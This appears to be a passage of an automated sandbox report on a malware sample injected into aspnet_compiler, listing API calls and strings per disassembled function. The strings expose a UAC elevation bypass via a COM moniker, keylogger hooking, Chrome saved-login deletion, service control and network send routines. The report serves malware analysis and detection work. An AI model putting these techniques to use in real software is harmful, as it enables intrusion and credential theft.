                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                                                          • String ID: 8[G
                                                          • API String ID: 1888522110-1691237782
                                                          • Opcode ID: 0057a6b8e9be89c2a124ace2c7aa15ce6e2280d77a8450e2501583d43799386c
                                                          • Instruction ID: f24a8317de74a0bbad47f265c67a45df51816e9018bfad09e00086f3728f1c27
                                                          • Opcode Fuzzy Hash: 0057a6b8e9be89c2a124ace2c7aa15ce6e2280d77a8450e2501583d43799386c
                                                          • Instruction Fuzzy Hash: EE318172508309AFD700DF90DC85FDBB7ECEB48715F00083ABA45961A1D6B5E948DB96
                                                          Function 00406764 Relevance: 15.8, APIs: 2, Strings: 7, Instructions: 55COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • _wcslen.LIBCMT ref: 00406788
                                                          • CoGetObject.OLE32(?,00000024,004659B0,00000000), ref: 004067E9
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Object_wcslen
                                                          • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                                                          • API String ID: 240030777-3166923314
                                                          • Opcode ID: db32128b02a1ccbc70c4588b7822f6c775a314ba91b6364ff21a4127614396bf
                                                          • Instruction ID: dba8c49f7cecafb8ed31af17d29d910bb03d3c12ecd117c8e18c4d6c9c114880
                                                          • Opcode Fuzzy Hash: db32128b02a1ccbc70c4588b7822f6c775a314ba91b6364ff21a4127614396bf
                                                          • Instruction Fuzzy Hash: 811170B2901118AEDB10FAA5884AA9EB7BCDB48714F55007FE905F3281E7789A148A7D
                                                          Function 004198C2 Relevance: 15.2, APIs: 10, Instructions: 228serviceCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004748F8), ref: 004198D8
                                                          • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 00419927
                                                          • GetLastError.KERNEL32 ref: 00419935
                                                          • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041996D
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                                          • String ID:
                                                          • API String ID: 3587775597-0
                                                          • Opcode ID: 46cfc2a1174990e4b59b9ee5729c715e61cf9958b22909a5f2789daa8df81af0
                                                          • Instruction ID: 5304d2aa3016a1bb8b693e548c532b43deb082133906afc562c92feca393f19d
                                                          • Opcode Fuzzy Hash: 46cfc2a1174990e4b59b9ee5729c715e61cf9958b22909a5f2789daa8df81af0
                                                          • Instruction Fuzzy Hash: 37812F711083049BC614FB21DC959AFB7A8BF94718F50493EF582521E2EF78AA05CB9A
                                                          Function 004513B7 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 188COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,?,?,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B), ref: 00446EC3
                                                            • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                            • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F37
                                                            • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                            • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446F1E
                                                            • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F2B
                                                          • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 004514C3
                                                          • IsValidCodePage.KERNEL32(00000000), ref: 0045151E
                                                          • IsValidLocale.KERNEL32(?,00000001), ref: 0045152D
                                                          • GetLocaleInfoW.KERNEL32(?,00001001,<D,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 00451575
                                                          • GetLocaleInfoW.KERNEL32(?,00001002,00000000,00000040), ref: 00451594
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                                          • String ID: <D$<D$<D
                                                          • API String ID: 745075371-3495170934
                                                          • Opcode ID: 5c8e94395c66df2641350def7a129c2a5847567c9c00908226c609ff7e549d11
                                                          • Instruction ID: fdda48fcf8ef828b158f806230e01f9d82b9b72a6df542884d0e4dc3e0683d2c
                                                          • Opcode Fuzzy Hash: 5c8e94395c66df2641350def7a129c2a5847567c9c00908226c609ff7e549d11
                                                          • Instruction Fuzzy Hash: 5A51D571900205ABEF10EFA5CC40BBF73B8AF05702F14056BFD11EB262E7789A488769
                                                          Function 004099E4 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 65windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 00409A01
                                                          • SetWindowsHookExA.USER32(0000000D,004099D0,00000000), ref: 00409A0F
                                                          • GetLastError.KERNEL32 ref: 00409A1B
                                                            • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                          • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00409A6B
                                                          • TranslateMessage.USER32(?), ref: 00409A7A
                                                          • DispatchMessageA.USER32(?), ref: 00409A85
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                                          • String ID: Keylogger initialization failure: error $`#v
                                                          • API String ID: 3219506041-3226811161
                                                          • Opcode ID: 10065da0f80e2b1588f186909b8751ab17816e81d90ef01b858d99eb9022e310
                                                          • Instruction ID: 76b292cdb4e6355f9a4176d1f10d626d2d11be3de55f9aee7ae49bf60faff0c2
                                                          • Opcode Fuzzy Hash: 10065da0f80e2b1588f186909b8751ab17816e81d90ef01b858d99eb9022e310
                                                          • Instruction Fuzzy Hash: 201194716043015BC710AB7AAC4996B77ECAB94B15B10057FFC45D2291FB34DE01CBAB
                                                          Function 0041B42F Relevance: 13.6, APIs: 9, Instructions: 105fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B489
                                                          • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B4BB
                                                          • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B529
                                                          • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B536
                                                            • Part of subcall function 0041B42F: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B50C
                                                          • FindClose.KERNEL32(00000000,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B561
                                                          • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B568
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,00473EE8,00000000), ref: 0041B570
                                                          • FindClose.KERNEL32(00000000,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B583
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                                          • String ID:
                                                          • API String ID: 2341273852-0
                                                          • Opcode ID: 38605e05b284b3287545d71b9912fe11a1e5e192bb535f2a18b99cb8ec032d5d
                                                          • Instruction ID: e81c2b0307560c21eb772b723951cbad4d8c7a866ea933437d0d5d39764c0eb1
                                                          • Opcode Fuzzy Hash: 38605e05b284b3287545d71b9912fe11a1e5e192bb535f2a18b99cb8ec032d5d
                                                          • Instruction Fuzzy Hash: 0031627184921CAACB20D7B1AC89ADA77BCAF04309F4405EBF505D3181EB799AC5CE69
                                                          Function 00418C69 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 245fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • FindFirstFileW.KERNEL32(00000000,?), ref: 00418EBF
                                                          • FindNextFileW.KERNEL32(00000000,?,?), ref: 00418F8B
                                                            • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,00403AF3,00465324), ref: 0041B633
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File$Find$CreateFirstNext
                                                          • String ID: @CG$XCG$`HG$`HG$>G
                                                          • API String ID: 341183262-3780268858
                                                          • Opcode ID: c7ab7af1c0f5eed08ada90e0087c4ff74bdb9080a69c09e479a4fb32dedf6aac
                                                          • Instruction ID: 861c71bda04042c44626cba1538e35c757a91b728f0af2478fb4c1063bb13cc5
                                                          • Opcode Fuzzy Hash: c7ab7af1c0f5eed08ada90e0087c4ff74bdb9080a69c09e479a4fb32dedf6aac
                                                          • Instruction Fuzzy Hash: B08141315042405BC314FB62C892EEFB3A5AFD1718F50493FF946671E2EF389A49C69A
                                                          Function 00412F45 Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 391registrylibraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,00000000,00000001), ref: 0041301A
                                                          • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000001), ref: 00413026
                                                            • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                          • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 004131ED
                                                          • GetProcAddress.KERNEL32(00000000), ref: 004131F4
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressCloseCreateLibraryLoadProcsend
                                                          • String ID: SHDeleteKeyW$Shlwapi.dll
                                                          • API String ID: 2127411465-314212984
                                                          • Opcode ID: 1163e221b778e35c2499fbcc33069a612b15ae3562f6ed67ec451ccccf7f4a1f
                                                          • Instruction ID: cc67afc49b78d61a2372e1362dfc4f5d4a672f2d1b5b468e2109e7b1f18a6fb5
                                                          • Opcode Fuzzy Hash: 1163e221b778e35c2499fbcc33069a612b15ae3562f6ed67ec451ccccf7f4a1f
                                                          • Instruction Fuzzy Hash: 4FB1B671A043006BC614BA76CC979BE76989F94718F40063FF946B31E2EF7C9A4486DB
                                                          Function 0040E54F Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 88sleepCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 004124B7: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000), ref: 004124D7
                                                            • Part of subcall function 004124B7: RegQueryValueExA.ADVAPI32(00000000,?,00000000,?,?,?), ref: 004124F5
                                                            • Part of subcall function 004124B7: RegCloseKey.ADVAPI32(00000000), ref: 00412500
                                                          • Sleep.KERNEL32(00000BB8), ref: 0040E603
                                                          • ExitProcess.KERNEL32 ref: 0040E672
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseExitOpenProcessQuerySleepValue
                                                          • String ID: 5.3.0 Pro$override$pth_unenc$BG
                                                          • API String ID: 2281282204-3981147832
                                                          • Opcode ID: a8e2c88ceb4e55fd25039a1be51ceaadab504b075b3d7079739a6e0ae32f2795
                                                          • Instruction ID: 346becae97c590b24629de205d3f766cc2ad037e5fc603921d36f10068cff0f4
                                                          • Opcode Fuzzy Hash: a8e2c88ceb4e55fd25039a1be51ceaadab504b075b3d7079739a6e0ae32f2795
                                                          • Instruction Fuzzy Hash: 6B21A131B0030027C608767A891BA6F359A9B91719F90443EF805A76D7EE7D8A6083DF
                                                          Function 0040B21B Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 48fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040B257
                                                          • GetLastError.KERNEL32 ref: 0040B261
                                                          Strings
                                                          • [Chrome StoredLogins not found], xrefs: 0040B27B
                                                          • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040B222
                                                          • [Chrome StoredLogins found, cleared!], xrefs: 0040B287
                                                          • UserProfile, xrefs: 0040B227
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: DeleteErrorFileLast
                                                          • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                                          • API String ID: 2018770650-1062637481
                                                          • Opcode ID: b5e309dbdaf0aeabe7af2cd1639cb477138ee585283f82b93ad88acdd4edf375
                                                          • Instruction ID: 236ee74dc97b4bdf00ef4875347123a6b81b21ae8e03a402b83ae8c28ff1bd46
                                                          • Opcode Fuzzy Hash: b5e309dbdaf0aeabe7af2cd1639cb477138ee585283f82b93ad88acdd4edf375
                                                          • Instruction Fuzzy Hash: 3001A23168410597CA0477B5ED6F8AE3624E921704F50017FF802731E2FF3A9A0586DE
                                                          Function 00416AB7 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 32COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetCurrentProcess.KERNEL32(00000028,?), ref: 00416AC4
                                                          • OpenProcessToken.ADVAPI32(00000000), ref: 00416ACB
                                                          • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00416ADD
                                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00416AFC
                                                          • GetLastError.KERNEL32 ref: 00416B02
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                                          • String ID: SeShutdownPrivilege
                                                          • API String ID: 3534403312-3733053543
                                                          • Opcode ID: e04eb0b34037921419aad719b93aaa051d7dc20f4e189cf25d4eb9764effedfd
                                                          • Instruction ID: c28276ca820f5d67da4083ad645d4fedab17ddc29f560671af9b7c8b6b4fa774
                                                          • Opcode Fuzzy Hash: e04eb0b34037921419aad719b93aaa051d7dc20f4e189cf25d4eb9764effedfd
                                                          • Instruction Fuzzy Hash: 25F0D4B5805229BBDB10ABA1EC4DEEF7EBCEF05656F100061B805E2192D6748A44CAB5
                                                          Function 00452F00 Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: __floor_pentium4
                                                          • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                          • API String ID: 4168288129-2761157908
                                                          • Opcode ID: 66bc95b00190c33de1dc88885a8d3c2e2540cf288971a00217ef3550ead5f7a6
                                                          • Instruction ID: 57cc16b57fb9b80973019f24a4c29afa226e887048a240d5689d112d8919aadd
                                                          • Opcode Fuzzy Hash: 66bc95b00190c33de1dc88885a8d3c2e2540cf288971a00217ef3550ead5f7a6
                                                          • Instruction Fuzzy Hash: 08C26F72D046288FDB25CE28DD407EAB7B5EB44346F1441EBD84DE7242E778AE898F44
                                                          Function 004089A9 Relevance: 9.3, APIs: 6, Instructions: 288fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 004089AE
                                                            • Part of subcall function 004041F1: socket.WS2_32(?,00000001,00000006), ref: 00404212
                                                            • Part of subcall function 0040428C: connect.WS2_32(?,?,?), ref: 004042A5
                                                          • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 00408A8D
                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 00408AE0
                                                          • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 00408AF7
                                                            • Part of subcall function 00404468: WaitForSingleObject.KERNEL32(?,00000000,00401943,?,?,00000004,?,?,00000004,00475B70,00473EE8,00000000), ref: 0040450E
                                                            • Part of subcall function 00404468: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00475B70,00473EE8,00000000,?,?,?,?,?,00401943), ref: 0040453C
                                                            • Part of subcall function 004047EB: WaitForSingleObject.KERNEL32(?,000000FF,00475B70,?,?,00000000,00475B70,004017F3), ref: 004047FD
                                                            • Part of subcall function 004047EB: SetEvent.KERNEL32(?,?,?,00000000,00475B70,004017F3), ref: 00404808
                                                            • Part of subcall function 004047EB: CloseHandle.KERNELBASE(?,?,?,00000000,00475B70,004017F3), ref: 00404811
                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00408DA1
                                                            • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Find$CloseEventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsendsocket
                                                          • String ID:
                                                          • API String ID: 4043647387-0
                                                          • Opcode ID: 09a69e0303e81d48d1e7444200da9c76687e86ed7c9a89389c8c98f32268c2c3
                                                          • Instruction ID: d7705bc86650fd6632c5f082d335fbcd32bd3fe840799e2454ee74f5ab9ae988
                                                          • Opcode Fuzzy Hash: 09a69e0303e81d48d1e7444200da9c76687e86ed7c9a89389c8c98f32268c2c3
                                                          • Instruction Fuzzy Hash: 11A15C729001089ACB14EBA1DD92AEDB778AF54318F10427FF546B71D2EF385E498B98
                                                          Function 00419BC4 Relevance: 9.0, APIs: 6, Instructions: 39serviceCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,?,?,0041981A,00000000,00000000), ref: 00419BCD
                                                          • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,?,0041981A,00000000,00000000), ref: 00419BE2
                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,0041981A,00000000,00000000), ref: 00419BEF
                                                          • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,?,0041981A,00000000,00000000), ref: 00419BFA
                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,0041981A,00000000,00000000), ref: 00419C0C
                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,0041981A,00000000,00000000), ref: 00419C0F
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Service$CloseHandle$Open$ManagerStart
                                                          • String ID:
                                                          • API String ID: 276877138-0
                                                          • Opcode ID: 413273253f7cbae0f6bd9debfc52a3b8d95171ad4a984208ec06c12d82ce07c5
                                                          • Instruction ID: 9ab78235182221d9a13884b701025ebbd4d22640777282bd149d85cf0e5c5631
                                                          • Opcode Fuzzy Hash: 413273253f7cbae0f6bd9debfc52a3b8d95171ad4a984208ec06c12d82ce07c5
                                                          • Instruction Fuzzy Hash: 46F0E971404314AFD2115B31FC88DBF2AACEF85BA2B00043AF54193191CF68CD4595B9
                                                          Function 004158B9 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 97libraryloadershutdownCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00416AB7: GetCurrentProcess.KERNEL32(00000028,?), ref: 00416AC4
                                                            • Part of subcall function 00416AB7: OpenProcessToken.ADVAPI32(00000000), ref: 00416ACB
                                                            • Part of subcall function 00416AB7: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00416ADD
                                                            • Part of subcall function 00416AB7: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00416AFC
                                                            • Part of subcall function 00416AB7: GetLastError.KERNEL32 ref: 00416B02
                                                          • ExitWindowsEx.USER32(00000000,00000001), ref: 0041595B
                                                          • LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 00415970
                                                          • GetProcAddress.KERNEL32(00000000), ref: 00415977
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                                          • String ID: PowrProf.dll$SetSuspendState
                                                          • API String ID: 1589313981-1420736420
                                                          • Opcode ID: 760194600065aa930d76b91875d7e389ee81a04dff370ffb8731a3af4adaf024
                                                          • Instruction ID: 94bd0be5b4d635cf3270abd21b93e0cba208aed3fdadf5553bbce7524c8ebf13
                                                          • Opcode Fuzzy Hash: 760194600065aa930d76b91875d7e389ee81a04dff370ffb8731a3af4adaf024
                                                          • Instruction Fuzzy Hash: 7D2150B0604741E6CA14F7B19856AEF225A9F80748F40883FB402A72D2EF7CDC89865E
                                                          Function 004511E3 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,00451502,?,00000000), ref: 0045127C
                                                          • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,00451502,?,00000000), ref: 004512A5
                                                          • GetACP.KERNEL32(?,?,00451502,?,00000000), ref: 004512BA
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: InfoLocale
                                                          • String ID: ACP$OCP
                                                          • API String ID: 2299586839-711371036
                                                          • Opcode ID: 3e26eff85c0b030be7827b2fbb91fc7191fc27f2fce1bf15d40cdf94764cc661
                                                          • Instruction ID: bcb6c1b5649eca6e102b6d6ca9fa22aa61ab34f591545d84575f60c76f210f03
                                                          • Opcode Fuzzy Hash: 3e26eff85c0b030be7827b2fbb91fc7191fc27f2fce1bf15d40cdf94764cc661
                                                          • Instruction Fuzzy Hash: 50212722600100A6D7348F54D900BAB73A6AB40B66F1645E6FD09E7322F736DD49C799
                                                          Function 0041A63F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 25COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • FindResourceA.KERNEL32(SETTINGS,0000000A,00000000), ref: 0041A650
                                                          • LoadResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A664
                                                          • LockResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A66B
                                                          • SizeofResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A67A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Resource$FindLoadLockSizeof
                                                          • String ID: SETTINGS
                                                          • API String ID: 3473537107-594951305
                                                          • Opcode ID: e32b0715ad7aadeb38a8c4a618404dc1e86643bbbf9351d1ef3d996740a46f90
                                                          • Instruction ID: 83a829ee02157d331b98a48cb758db5ec39b6d120b3a3db205f860a33549a403
                                                          • Opcode Fuzzy Hash: e32b0715ad7aadeb38a8c4a618404dc1e86643bbbf9351d1ef3d996740a46f90
                                                          • Instruction Fuzzy Hash: 3EE01A3A200710ABCB211BA5BC8CD477E39E7867633140036F90582331DA358850CA59
                                                          Function 00407A8C Relevance: 7.7, APIs: 5, Instructions: 183fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 00407A91
                                                          • FindFirstFileW.KERNEL32(00000000,?,00465AA0,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B4A
                                                          • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B6E
                                                          • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407C76
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Find$File$CloseFirstH_prologNext
                                                          • String ID:
                                                          • API String ID: 1157919129-0
                                                          • Opcode ID: be329e02f9a977489ec03ab4a587285a9e8b683dbacd723bef2334c22b0cd63e
                                                          • Instruction ID: c296e4c637b16ec180f1d25cf2666c4e6f2336455dd814d501b84ef2841b6e91
                                                          • Opcode Fuzzy Hash: be329e02f9a977489ec03ab4a587285a9e8b683dbacd723bef2334c22b0cd63e
                                                          • Instruction Fuzzy Hash: 485173329041085ACB14FB65DD969DD7778AF50318F50417EB806B31E2EF38AB498B99
                                                          Function 0044800F Relevance: 7.7, APIs: 5, Instructions: 171timeCOMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045D478), ref: 00448079
                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,0047179C,000000FF,00000000,0000003F,00000000,?,?), ref: 004480F1
                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,004717F0,000000FF,?,0000003F,00000000,?), ref: 0044811E
                                                          • _free.LIBCMT ref: 00448067
